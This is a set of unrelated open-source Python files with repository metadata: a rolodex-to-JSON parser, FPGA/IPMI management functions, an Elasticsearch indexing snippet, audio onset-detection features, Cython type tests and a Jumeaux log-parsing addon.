    pts = [(coords[2 * i], coords[2 * i + 1]) for i in range(n)]
    # Count the building if the wire crosses any of its edges.
    if any(line_intersection(wire, (pts[i], pts[(i + 1) % n])) for i in range(n)):
        hits += 1
print(hits)
| 24.166667 | 128 | 0.489655 |
46e6e58e94f0e3a25d6fe545a26c83e5f8f5192a
| 9,535 |
py
|
Python
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
"""
This module is used to parse entries of personal information and write them as the formatted & valid JSON into an output file. Please check details of requirments from 'rolodex_instructions.pdf' in the root directory of this project.
"""
import json
import re
from collections import OrderedDict
ele_names = ['color', 'firstname', 'lastname', 'phonenumber', 'zipcode']
class Factory():
    '''
    Factory bundles the three collaborating classes for this task:
    Normalizer, Validation, Converter.
    '''
def __init__(self):
"""
Construct a new 'Factory' object
:attr vld: Instance of Validation Object
:attr nlz: Instance of Normalizer Object
:attr cvt: Instance of Converter Object
:return: nothing
"""
self.vld = Validation()
self.nlz = Normalizer(self.vld)
self.cvt = Converter(self.vld, self.nlz)
class Normalizer():
def __init__(self, validation):
"""
Construct a new 'Normalizer' object
:param validation: Instance of Validation Object
:attr normfunc: a list of functions of Normalization for different elements of a valid entry
:attr vld: Instance of Validation Object
:return: nothing
"""
normfunc = [self.normColor, self.normName, self.normName, self.normPhoneNum, self.normZipCode]
self.normfunc = normfunc
self.vld = validation
def normColor(self, color):
"""
Normalize color
:param color: a string for color name
:return: a string without spaces of two ends
"""
return color.strip()
def normName(self, name):
"""
Normalize name
:param name: a string for person's firstname or lastname
:return: a string without spaces of two ends
"""
return name.strip()
def normPhoneNum(self, num):
"""
Normalize phone number
:param num: a string for phone number
:return: a formatted string like '888-888-8888' if num is valid. Otherwise, ''.
"""
num = num.strip()
if self.vld.validPhoneNum(num):
nl_num = ''.join(re.findall(r'\d+', num))
nl_num = nl_num[:3] + '-' + nl_num[3:6] + '-' + nl_num[6:10]
return nl_num
return ''
def normZipCode(self, code):
"""
Normalize zip code
:param code: a string for zip code
:return: a string without spaces
"""
return ''.join(code.split())
def normAll(self, ord_ent):
"""
Normalize all elements of an entry
        :param ord_ent: a list of all ordered elements of an entry
:return: a list of all normalized & ordered elements of an entry
"""
nl_ord_ent = []
nf = self.normfunc
for i in range(len(ord_ent)):
nl_ord_ent.append(nf[i](ord_ent[i]))
return nl_ord_ent
class Validation():
def __init__(self):
"""
Construct a new 'Validation' object
:attr valfunc: a list of functions of Validation for different elements of an entry
:return: nothing
"""
valfunc = [self.validColor, self.validName, self.validName, self.validPhoneNum, self.validZipCode]
self.valfunc = valfunc
def validColor(self, color):
# We can create a set of color names.
# If 'color' is not in the set, return False
"""
Validate color
:param color: a string for color name
:return: True
"""
return True
def validName(self, name):
# We maybe need the validation for first & last name separately
# Maybe needed if required: return False if it contains any special char instead of '.'
"""
Validate name
:param name: a string for person's firstname or lastname
:return: False if it contains nothing or any digits. Otherwise, True.
"""
if name == '':
return False
if bool(re.search(r'\d', name)):
return False
return True
def validPhoneNum(self, num):
# Assumption
"""
Validate phone number
:param num: a string for phone number
:return: False if it doesn't contain exactly 10 digits. Otherwise, True.
"""
if len(''.join(re.findall(r'\d+', num))) == 10:
return True
return False
def validZipCode(self, code):
# Don't know any restriction for each number of zipcode.
# But I can check details via https://en.wikipedia.org/wiki/ZIP_code#Structure_and_allocation
"""
Validate zip code
:param code: a string for zip code
:return: False if it is not exactly 5 consecutive digits. Otherwise, True.
"""
if len(code) != 5:
return False
if not code.isdigit():
return False
return True
def validAll(self, nl_ord_ents):
"""
Validate all elements of an entry
:param nl_ord_ents: a list of all normalized & ordered elements of an entry
:return: False if any element is not valid. Otherwise, True
"""
vf = self.valfunc
for i in range(len(nl_ord_ents)):
if not vf[i](nl_ord_ents[i]):
return False
return True
class Converter():
def __init__(self, validation, normalizer):
"""
Construct a new 'Converter' object
:param validation: Instance of Validation Object
:param normalizer: Instance of Normalizer Object
:attr vld: Instance of Validation Object
:attr nlz: Instance of Normalizer Object
:return: nothing
"""
self.vld = validation
self.nlz = normalizer
def process(self, line):
"""
        Process one row/line/entry of the input file. There are six steps; later steps are skipped once the line is found invalid.
        1. Check that the number of elements is valid (4 or 5); otherwise return None.
        2. Decide which of the three formats it is, based on the index of the phone number.
        3. Reorder elements based on the corresponding pattern.
        4. Normalize all elements of the ordered & valid entry.
        5. Check if the entry is valid.
        6. Construct the mapping. The mapping is an ordered dict with the ordered keys ['color', 'firstname', 'lastname', 'phonenumber', 'zipcode'], and their corresponding elements from the entry
:param line: a row/ line/ entry of the input file
:return: None if the line is invalid. Otherwise, the mapping.
"""
# Check the number of elements is valid
ent = line.split(',')
nelemnts = len(ele_names)
if len(ent) != nelemnts and len(ent) != nelemnts - 1:
return None
# Decide which format it is (one of three formats)
if len(ent) == nelemnts - 1:
if len(ent[0].rsplit(None, 1)) != 2:
return None
[Firstname, Lastname] = ent[0].rsplit(None, 1)
ent = [Firstname, Lastname] + ent[1:]
phone_num_candidates = ent[2:5]
ptype = -1
for i in range(3):
if self.vld.validPhoneNum(phone_num_candidates[i]):
ptype = i
break
if ptype == -1:
return None
# Reorder elements based on the corresponding pattern
ptrns = [[3, 1, 0, 2, 4], [4, 0, 1, 3, 2], [2, 0, 1, 4, 3]]
ord_ent = [ent[idx] for idx in ptrns[ptype]]
        # Normalize all elements of the ordered & valid entry
nl_ord_ent = self.nlz.normAll(ord_ent)
# Check if the entry is valid
if not self.vld.validAll(nl_ord_ent):
return None
        # Construct the mapping
mp = OrderedDict()
for i in range(len(nl_ord_ent)):
mp[ele_names[i]] = nl_ord_ent[i]
return mp
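    # Worked examples of the three accepted formats, reconstructed from the
    # reorder patterns above (names and numbers are illustrative only):
    #   ptype 0: "Lastname, Firstname, 703 742 0996, Blue, 10013"
    #   ptype 1: "Firstname, Lastname, 10013, 646 111 0101, Green"
    #   ptype 2: "Firstname Lastname, Red, 11237, 703 955 0373"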
def ent2json(self, fname):
"""
Parse each line / entry of personal information from an input file, and write them as the formatted & valid JSON into an output file.
:param fname: the absolute or relative path of input file
:return: nothing
"""
res = OrderedDict([('entries', []), ('errors', [])])
with open(fname) as f:
lines = f.readlines()
for i in range(len(lines)):
mapping = self.process(lines[i])
if mapping is not None:
res['entries'].append(mapping)
else:
res['errors'].append(i)
if res['entries'] == []:
del res['entries']
else:
entries = sorted(res['entries'], key=lambda t: (t['lastname'], t['firstname']))
res['entries'] = entries
if res['errors'] == []:
del res['errors']
        # Assumes the input file ends in ".in": "data.in" -> "data.out"
        with open(fname[:-2] + 'out', 'w') as outfile:
if res != OrderedDict():
json.dump(res, outfile, indent=2)
if __name__ == "__main__":
fac = Factory()
vld, nlz, cvt = fac.vld, fac.nlz, fac.cvt
    print('Please input the absolute path of the input file')
    fname = input()
cvt.ent2json(fname)
| 29.611801 | 233 | 0.56581 |
03b1bdb95fcdfb32ef5d8620d14e914fa5b8814f
| 13,470 |
py
|
Python
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
# Copyright (C) Microsoft Corporation. All rights reserved.
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#!/usr/bin/python
# -*- coding: utf-8 -*-
from utils import *
from ipmicmd_library import *
############################################################################################################
# FPGA set functions
############################################################################################################
def set_fpga_bypass(serverid, bypass):
if bypass == "Enabled":
return set_fpga_bypass_on(serverid)
elif bypass == "Disabled":
return set_fpga_bypass_off(serverid)
else:
return set_failure_dict("set_fpga_bypass invalid type {0}.".format(bypass),
completion_code.failure)
def set_fpga_bypass_on(serverid):
""" Set FPGA bypass mode on
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaaction", "setbypass"])
return parse_set_fpga_bypass(interface, "setbypass")
    except Exception as e:
return set_failure_dict("set_fpga_bypass_on() Exception {0}".format(e), completion_code.failure)
def set_fpga_bypass_off(serverid):
""" Set FPGA bypass mode off
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaaction", "clearbypass"])
return parse_set_fpga_bypass(interface, "clearbypass")
    except Exception as e:
return set_failure_dict("set_fpga_bypass_off() Exception {0}".format(e), completion_code.failure)
############################################################################################################
# FPGA get functions
############################################################################################################
def get_fpga_bypass_mode(serverid):
""" Read back FPGA bypass mode setting
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "mode"])
return parse_get_fpga_bypass_mode(interface, "mode")
    except Exception as e:
return set_failure_dict("get_fpga_bypass_mode() Exception {0}".format(e), completion_code.failure)
def get_fpga_health(serverid):
""" Read back FPGA health
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "health"])
return parse_get_fpga_health(interface, "health")
    except Exception as e:
return set_failure_dict("get_fpga_health() Exception {0}".format(e), completion_code.failure)
def get_fpga_temp(serverid):
""" Read back FPGA temperature
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "temp"])
return parse_get_fpga_temp(interface, "temp")
    except Exception as e:
return set_failure_dict("get_fpga_temp() Exception {0}".format(e), completion_code.failure)
def get_fpga_i2c_version(serverid):
""" Read back FPGA I2C version
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "i2cversion"])
return parse_get_fpga_i2cversion(interface, "i2cversion")
    except Exception as e:
return set_failure_dict("get_fpga_i2c_version() Exception {0}".format(e), completion_code.failure)
def get_fpga_assetinfo(serverid):
""" Read back product info area from FPGA FRU
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "assetinfo"])
return parse_get_fpga_assetinfo(interface, "assetinfo")
    except Exception as e:
return set_failure_dict("get_fpga_assetinfo() Exception {0}".format(e), completion_code.failure)
############################################################################################################
# FPGA parse output functions
############################################################################################################
def parse_set_fpga_bypass(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
if output['status_code'] == 0:
return set_success_dict()
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_set_fpga_bypass() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_bypass_mode(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_mode = {}
if output['status_code'] == 0:
get_mode_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_mode_data = filter(None, get_mode_data)
get_mode[completion_code.cc_key] = completion_code.success
for string in get_mode_data:
if "Bypass Mode" in string:
get_mode["Bypass Mode"] = string.split(":")[-1].strip()
elif "User Logic Network" in string:
get_mode["User Logic Network"] = string.split(":")[-1].strip()
return get_mode
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_get_fpga_bypass_mode() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_temp(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_temp = {}
if output['status_code'] == 0:
get_temp_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_temp_data = filter(None, get_temp_data)
get_temp[completion_code.cc_key] = completion_code.success
for string in get_temp_data:
if "Temperature in Celsius" in string:
get_temp["Temperature in Celsius"] = string.split(":")[-1].strip()
return get_temp
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_get_fpga_temp() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_i2cversion(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_ver = {}
if output['status_code'] == 0:
get_ver_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_ver_data = filter(None, get_ver_data)
get_ver[completion_code.cc_key] = completion_code.success
for string in get_ver_data:
if "I2C Version" in string:
get_ver["I2C Version"] = string.split(":")[-1].strip()
return get_ver
else:
error_data = output['stderr']
            return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_get_fpga_i2cversion() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_health(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_health = {}
if output['status_code'] == 0:
get_health_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_health_data = filter(None, get_health_data)
get_health[completion_code.cc_key] = completion_code.success
for string in get_health_data:
if "PCIe HIP 0 Up" in string:
get_health["PCIe HIP 0 Up"] = string.split(":")[-1].strip()
elif "PCIe HIP 1 Up" in string:
get_health["PCIe HIP 1 Up"] = string.split(":")[-1].strip()
elif "40G Link 0 Up" in string:
get_health["40G Link 0 Up"] = string.split(":")[-1].strip()
elif "40G Link 0 Tx Activity" in string:
get_health["40G Link 0 Tx Activity"] = string.split(":")[-1].strip()
elif "40G Link 0 Rx Activity" in string:
get_health["40G Link 0 Rx Activity"] = string.split(":")[-1].strip()
elif "40G Link 1 Up" in string:
get_health["40G Link 1 Up"] = string.split(":")[-1].strip()
elif "40G Link 1 Tx Activity" in string:
get_health["40G Link 1 Tx Activity"] = string.split(":")[-1].strip()
elif "40G Link 1 Rx Activity" in string:
get_health["40G Link 1 Rx Activity"] = string.split(":")[-1].strip()
return get_health
else:
error_data = output['stderr']
            return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_get_fpga_health() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_assetinfo(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_assetinfo = {}
if output['status_code'] == 0:
get_fru_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_fru_data = filter(None, get_fru_data)
get_assetinfo[completion_code.cc_key] = completion_code.success
for string in get_fru_data:
if "Product Manufacturer" in string:
get_assetinfo["Product Manufacturer"] = string.split(":")[-1].strip()
elif "Product Name" in string:
get_assetinfo["Product Name"] = string.split(":")[-1].strip()
elif "Product Model Number" in string:
get_assetinfo["Product Model Number"] = string.split(":")[-1].strip()
elif "Product Version" in string:
get_assetinfo["Product Version"] = string.split(":")[-1].strip()
elif "Product Serial Number" in string:
get_assetinfo["Product Serial Number"] = string.split(":")[-1].strip()
elif "Product FRU File ID" in string:
get_assetinfo["Product FRU File ID"] = string.split(":")[-1].strip()
elif "Product Custom Field 1" in string:
get_assetinfo["Product Custom Field 1"] = string.split(":")[-1].strip()
elif "Product Custom Field 2" in string:
get_assetinfo["Product Custom Field 2"] = string.split(":")[-1].strip()
return get_assetinfo
else:
error_data = output['stderr']
            return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
    except Exception as e:
return set_failure_dict("parse_get_fpga_assetinfo() Exception {0}".format(e), completion_code.failure)
| 45.201342 | 113 | 0.518486 |
208337278275bee9002af264c40fa5bf3f08d11d
| 498 |
py
|
Python
|
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 1 |
2021-11-05T07:48:26.000Z
|
2021-11-05T07:48:26.000Z
|
from elasticsearch import Elasticsearch
es = Elasticsearch(
hosts = [{'host': 'es-domain.es.amazonaws.com', 'port': 443}],
use_ssl=True, verify_certs=True
)
document = {"name": "ruan", "surname": "bekker"}
response = es.index(index='my-index', doc_type='_doc', body=document)
# response
# {'_index': 'my-index', '_type': '_doc', '_id': 'Mlq9FHMB6HS5JLZeF5Rs', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 1, 'failed': 0}, '_seq_no': 0, '_primary_term': 1}
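# Reading the document back with the same client (doc_type as above):
# doc = es.get(index='my-index', doc_type='_doc', id=response['_id'])
# print(doc['_source'])  # {'name': 'ruan', 'surname': 'bekker'}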
| 35.571429 | 197 | 0.650602 |
b35829957542c4d9b959727d95d83e5c13e2f5b0
| 3,344 |
py
|
Python
|
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | 6 |
2019-02-28T05:43:58.000Z
|
2021-03-02T17:05:13.000Z
|
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | null | null | null |
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | 1 |
2020-02-07T17:10:40.000Z
|
2020-02-07T17:10:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import librosa
import scipy.signal
import numpy as np
from .utils import read_audio
FRAME_INTERVAL = 0.01 # s
def cq_matrix(bins_per_octave, num_bins, f_min, fft_len, sr):
"""
Compute center frequencies of the log-spaced filterbank
Parameters
----------
bins_per_octave : int
num_bins : int
f_min : float
fft_len : int
sr : float
Returns
-------
c_mat
"""
# note range goes from -1 to bpo*num_oct for boundary issues
f_cq = f_min * 2 ** ((np.arange(-1, num_bins+1)) / bins_per_octave)
# centers in bins
kc = np.round(f_cq * (fft_len / sr)).astype(int)
c_mat = np.zeros([num_bins, int(np.round(fft_len / 2))])
for k in range(1, kc.shape[0]-1):
l1 = kc[k]-kc[k-1]
        w1 = scipy.signal.windows.triang((l1 * 2) + 1)  # signal.triang moved to signal.windows in modern SciPy
l2 = kc[k+1]-kc[k]
        w2 = scipy.signal.windows.triang((l2 * 2) + 1)
wk = np.hstack([w1[0:l1], w2[l2:]]) # concatenate two halves
c_mat[k-1, kc[k-1]:(kc[k+1]+1)] = wk / np.sum(wk) # normalized to unit sum;
return c_mat
def onset_detection_fn(x, f_win_size, f_hop_size, f_bins_per_octave, f_octaves, f_fmin, sr, mean_filter_size):
"""
Filter bank for onset pattern calculation
"""
# calculate frequency constant-q transform
f_win = scipy.signal.hanning(f_win_size)
x_spec = librosa.stft(x,
n_fft=f_win_size,
hop_length=f_hop_size,
win_length=f_win_size,
window=f_win)
x_spec = np.abs(x_spec) / (2 * np.sum(f_win))
f_cq_mat = cq_matrix(f_bins_per_octave, f_octaves * f_bins_per_octave, f_fmin, f_win_size, sr)
x_cq_spec = np.dot(f_cq_mat, x_spec[:-1, :])
# subtract moving mean
b = np.concatenate([[1], np.ones(mean_filter_size, dtype=float) / -mean_filter_size])
od_fun = scipy.signal.lfilter(b, 1, x_cq_spec, axis=1)
# half-wave rectify
od_fun = np.maximum(0, od_fun)
# post-process OPs
od_fun = np.log10(1 + 1000*od_fun)
return od_fun, x_cq_spec
def extract_features(audio_file_path, sr=22050, channel=1):
x, sr = read_audio(audio_file_path, mono=True, sr=sr)
f_win_size = 1024
f_hop_size = int(round(FRAME_INTERVAL * sr))
f_bins_per_octave = 8
f_octaves = 8
f_fmin = 40
mean_filter_size = 22
# normalize
x /= np.max(np.abs(x))
od_fun, x_cq_spec = onset_detection_fn(x,
f_win_size,
f_hop_size,
f_bins_per_octave,
f_octaves,
f_fmin,
sr,
mean_filter_size)
logf_stft = librosa.power_to_db(x_cq_spec).astype('float32')
od_fun = np.abs(od_fun).astype('float32')
# reshape for model
ms_input_array = np.moveaxis(logf_stft, 1, 0)
ms_input_array = np.expand_dims(ms_input_array, axis=2)
os_input_array = np.moveaxis(od_fun, 1, 0)
os_input_array = np.clip(os_input_array / 2.25, 0, 1)
os_input_array = np.expand_dims(os_input_array, axis=2)
return ms_input_array, os_input_array, sr
| 31.54717 | 110 | 0.58134 |
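A hedged usage sketch for the onset-detection front end above, driving onset_detection_fn with a synthetic click train instead of an audio file; the import path is assumed from the record's repo layout, and a scipy version that still exposes scipy.signal.hanning/triang is assumed:

import numpy as np
from large_vocab_adt_dafx2018.features import onset_detection_fn

sr = 22050
x = np.zeros(sr)      # one second of silence ...
x[::sr // 4] = 1.0    # ... with a click every 0.25 s
od_fun, x_cq_spec = onset_detection_fn(
    x, f_win_size=1024, f_hop_size=int(round(0.01 * sr)),
    f_bins_per_octave=8, f_octaves=8, f_fmin=40,
    sr=sr, mean_filter_size=22)
print(od_fun.shape, x_cq_spec.shape)  # (64, n_frames) for 8 octaves x 8 bins per octave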
2fc751a07689597eb520fe0eb4337776e6ff00df | 16 | py | Python | python/coursera_python/MICHIGAN/DataStructures/test/range.py | SayanGhoshBDA/code-backup | 8b6135facc0e598e9686b2e8eb2d69dd68198b80 | ["MIT"] | 16 | 2018-11-26T08:39:42.000Z | 2019-05-08T10:09:52.000Z | python/coursera_python/MICHIGAN/DataStructures/test/range.py | SayanGhoshBDA/code-backup | 8b6135facc0e598e9686b2e8eb2d69dd68198b80 | ["MIT"] | 8 | 2020-05-04T06:29:26.000Z | 2022-02-12T05:33:16.000Z | python/coursera_python/MICHIGAN/DataStructures/test/range.py | SayanGhoshBDA/code-backup | 8b6135facc0e598e9686b2e8eb2d69dd68198b80 | ["MIT"] | 5 | 2020-02-11T16:02:21.000Z | 2021-02-05T07:48:30.000Z |
print(range(4))
| 8 | 15 | 0.6875 |
443364b93cce01dcca1b820f92bf7a1836a52bac | 318 | py | Python | python/en/archive/dropbox/miscellaneous_python_files/test.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null | python/en/archive/dropbox/miscellaneous_python_files/test.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null | python/en/archive/dropbox/miscellaneous_python_files/test.py | aimldl/coding | 70ddbfaa454ab92fd072ee8dc614ecc330b34a70 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 17 19:39:45 2019
@author: aimldl
"""
import numpy as np
print( np.random.choice(5, 3, replace=False ) )
a = ['pooh', 'rabbit', 'piglet', 'Christopher']
print( np.random.choice(a, 3, replace=False ) )
print( np.random.choice(8, 32, replace=True ) )  # drawing 32 values from a population of 8 requires replacement
| 18.705882 | 49 | 0.603774 |
448f63f63da035112046dadf9a070bc75195cdd7 | 1,247 | py | Python | transonic/backends/test_cython.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | ["BSD-3-Clause"] | 88 | 2019-01-08T16:39:08.000Z | 2022-02-06T14:19:23.000Z | transonic/backends/test_cython.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | ["BSD-3-Clause"] | 13 | 2019-06-20T15:53:10.000Z | 2021-02-09T11:03:29.000Z | transonic/backends/test_cython.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | ["BSD-3-Clause"] | 1 | 2019-11-05T03:03:14.000Z | 2019-11-05T03:03:14.000Z |
import numpy as np
from transonic import Array, const
from transonic.backends import backends
backend = backends["cython"]
type_formatter = backend.type_formatter
def compare(result, dtype, ndim, memview, mem_layout=None, positive_indices=None):
A = Array[dtype, ndim, memview, mem_layout, positive_indices]
assert A.format_as_backend_type(type_formatter) == result
def test_memview():
memview = "memview"
compare("np.int_t[:, ::1]", int, "2d", memview, "C")
compare("np.int_t[:, :, :]", int, "3d", memview, "strided")
compare("np.int32_t[::1, :]", np.int32, "2d", memview, "F")
def test_array():
memview = None
compare('np.ndarray[np.int_t, ndim=2, mode="c"]', int, "2d", memview, "C")
compare("np.ndarray[np.int_t, ndim=3]", int, "3d", memview, "strided")
compare(
'np.ndarray[np.int32_t, ndim=2, mode="f"]', np.int32, "2d", memview, "F"
)
compare(
"np.ndarray[np.int_t, ndim=2, negative_indices=False]",
int,
"2d",
memview,
positive_indices="positive_indices",
)
def test_const():
A = Array[int, "2d"]
assert "const " + A.format_as_backend_type(type_formatter) == const(
A
).format_as_backend_type(type_formatter)
| 29 | 82 | 0.639936 |
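For orientation, a hedged sketch of the behaviour the tests above pin down — formatting a transonic Array type for the Cython backend (the expected output string is taken from the compare calls in the file):

import numpy as np
from transonic import Array
from transonic.backends import backends

type_formatter = backends["cython"].type_formatter
A = Array[np.int32, "2d", "memview", "F"]
print(A.format_as_backend_type(type_formatter))  # "np.int32_t[::1, :]"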
928c78b0fe1b26f67912ffec8a40ea763b8c7622 | 2,173 | py | Python | jumeaux/addons/log2reqs/plain.py | ihatov08/jumeaux | 7d983474df4b6dcfa57ea1a66901fbc99ebababa | ["MIT"] | 11 | 2017-10-02T01:29:12.000Z | 2022-03-31T08:37:22.000Z | jumeaux/addons/log2reqs/plain.py | ihatov08/jumeaux | 7d983474df4b6dcfa57ea1a66901fbc99ebababa | ["MIT"] | 79 | 2017-07-16T14:47:17.000Z | 2022-03-31T08:49:14.000Z | jumeaux/addons/log2reqs/plain.py | ihatov08/jumeaux | 7d983474df4b6dcfa57ea1a66901fbc99ebababa | ["MIT"] | 2 | 2019-01-28T06:11:58.000Z | 2021-01-25T07:21:21.000Z |
# -*- coding:utf-8 -*-
import urllib.parse as urlparser
from typing import Dict, List
from owlmixin import OwlMixin, TOption
from owlmixin.owlcollections import TList
from jumeaux.addons.log2reqs import Log2ReqsExecutor
from jumeaux.logger import Logger
from jumeaux.models import Request, Log2ReqsAddOnPayload
logger: Logger = Logger(__name__)
LOG_PREFIX = "[log2reqs/plain]"
class Config(OwlMixin):
encoding: str = "utf8"
keep_blank: bool = False
candidate_for_url_encodings: TList[str] = []
def guess_url_encoding(query_str: str, encodings: TList[str]) -> TOption[str]:
for e in encodings:
try:
urlparser.parse_qs(query_str, encoding=e, errors="strict")
return TOption(e)
except UnicodeDecodeError:
pass
return TOption(None)
class Executor(Log2ReqsExecutor):
def __init__(self, config: dict):
self.config: Config = Config.from_dict(config or {})
def exec(self, payload: Log2ReqsAddOnPayload) -> TList[Request]:
def line_to_request(line: str, seq: int) -> Request:
logger.debug(f"{LOG_PREFIX} ---- {seq} ----")
path = line.split("?")[0]
logger.debug(f"{LOG_PREFIX} [path] {path}")
url_encoding = "utf-8"
qs: Dict[str, List[str]] = {}
if len(line.split("?")) > 1:
url_encoding = guess_url_encoding(
line.split("?")[1], self.config.candidate_for_url_encodings
).get_or("utf-8")
qs = urlparser.parse_qs(
line.split("?")[1],
keep_blank_values=self.config.keep_blank,
encoding=url_encoding,
)
logger.debug(f"{LOG_PREFIX} [qs] ({url_encoding}) {qs}")
return Request.from_dict(
{"path": path, "qs": qs, "headers": {}, "url_encoding": url_encoding}
)
with open(payload.file, encoding=self.config.encoding) as f:
requests: TList[Request] = TList([x.rstrip() for x in f if x != "\n"]).emap(
lambda x, i: line_to_request(x, i)
)
return requests
| 31.955882 | 88 | 0.591809 |
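A stand-alone sketch of the encoding-guessing trick used in guess_url_encoding above: strict query-string decoding is attempted against each candidate, and the first encoding that does not raise wins (the query bytes below are hypothetical; %E3%81%82 is valid UTF-8 but not valid EUC-JP):

import urllib.parse as urlparser

def guess(query_str, encodings):
    for e in encodings:
        try:
            urlparser.parse_qs(query_str, encoding=e, errors="strict")
            return e
        except UnicodeDecodeError:
            pass
    return None

print(guess("q=%E3%81%82", ["euc-jp", "utf-8"]))  # utf-8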
47289bd6c744dd7fccc3402945aabbba4a9bbc35 | 22,462 | py | Python | examples/test/generated/oss.py | Jumpscale/web | 8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb | ["Apache-2.0"] | 1 | 2015-10-26T10:38:32.000Z | 2015-10-26T10:38:32.000Z | examples/test/generated/oss.py | Jumpscale/web | 8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb | ["Apache-2.0"] | null | null | null | examples/test/generated/oss.py | Jumpscale/web | 8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb | ["Apache-2.0"] | null | null | null |
from mongoengine import *
classes=[]
class oss_comment(Document):
